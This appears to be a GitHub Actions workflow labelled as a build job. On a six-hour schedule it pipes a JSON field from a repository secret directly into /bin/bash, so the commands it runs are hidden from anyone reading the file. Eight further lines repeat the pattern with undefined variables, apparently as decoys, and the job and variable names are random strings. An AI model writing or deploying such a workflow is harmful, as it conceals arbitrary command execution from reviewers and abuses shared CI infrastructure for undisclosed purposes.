name: chengyasheng7618
on:
  workflow_dispatch:
  schedule:
    - cron: '21 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chengyasheng7618
        env:
          ubd3835: ${{ secrets.ubd3835 }}
        run: |
          echo $ubd3835 | jq -r .hsnfq9688 | /bin/bash
          echo $makh92 | jq -r .pqy87 | /bin/bash
          echo $v6 | jq -r .ow9 | /bin/bash
          echo $fm1877 | jq -r .y48 | /bin/bash
          echo $tn5121 | jq -r .utu05 | /bin/bash
          echo $o2 | jq -r .is5 | /bin/bash
          echo $vh559 | jq -r .rwbc15 | /bin/bash
          echo $wbqyq1 | jq -r .r0253 | /bin/bash
          echo $pp32 | jq -r .gfrw5040 | /bin/bash

